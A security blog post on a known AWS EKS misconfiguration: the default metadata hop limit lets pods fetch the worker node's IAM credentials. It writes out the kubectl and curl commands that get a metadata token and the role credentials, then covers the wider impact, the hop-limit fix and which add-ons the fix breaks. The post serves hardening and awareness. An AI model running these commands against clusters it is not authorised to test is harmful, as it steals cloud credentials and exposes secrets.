AWS EKS vulnerability
Before we start, I must clarify that there are no newly discovered 0‑Day vulnerabilities in this blog post, but rather a moment of clarity realizing how bad an already‑existing unpatched (N‑Day) vulnerability can be under certain circumstances.
The vulnerability discussed here is that AWS EKS clusters (Kubernetes) by default allow pods to steal worker node credentials. This is bad, but the patch is relatively simple with few side effects. I will take you through how the vulnerability is exploited, an example of what would amplify the impact, how it is patched, and examples of what potentially breaks.
The exploit
When spinning up an AWS EKS cluster, depending on the method used, your worker nodes might end up with a launch template configuration that has the default hop limit of 2. This means that pods are allowed to call the instance metadata service, because two network hops are allowed. The instance metadata service is what the EC2 instance (worker node) uses to get information about itself and its environment, including credentials, and this is where our exploit begins. Assuming that you can gain access to the cluster's pods or spin up new ones, be careful if following this example because the credentials, even though temporary, might end up in your logs.
# Spin up a new pod with an interactive shell
kubectl run -n default -i --tty --rm debug --image=alpine:latest --restart=Never -- sh
# Install curl
apk update && apk add curl
# Get a token from the metadata service
curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"
We have now obtained a token from the metadata service that can be used to retrieve the EC2 instance role name and its credentials. Continuing in the same pod as before.
# Get the EC2 instance role name
curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Get the EC2 instance role credentials
curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE
We have now obtained a valid set of AWS credentials with the same permission scope as your EC2 instance role.
The impact
It is very common for AWS EKS worker nodes to have access to pull container images or read data from SSM Parameter Store and probably more. In some environments where predictable naming patterns exist, decrypted access to certain secrets may still be possible even with limited list/describe permissions, which makes the impact more serious than initially expected. Some teams might prefer SSM Parameter Store for storing secrets over Secrets Manager, making the impact much worse.
The patch
To prevent pods from accessing the instance metadata service, set the EC2 instance metadata hop limit to 1 in your worker node launch templates. This blocks pod‑level IMDS access while keeping node‑level functionality intact. Be aware that some Kubernetes add‑ons or deployment tooling may rely on IMDS for cluster, network, or storage metadata. These components may need additional configuration, such as supplying explicit parameters or assigning dedicated IAM roles. The exact impact varies between setups, so it's important to evaluate this change in a non‑production environment first. Here are things I have discovered, but you might have more.
- AWS Load Balancer Controller can no longer get the VPC ID, so we need to supply it.
- EBS CSI driver will first attempt to call the metadata service for information, then fail, throwing an error and then falling back to getting it from Kubernetes instead.
- Flux Image Reflector Controller can no longer pull images from ECR, so an IRSA role needs to be supplied.
Disclaimer: This example reflects a generic EKS configuration and is not indicative of any specific environment.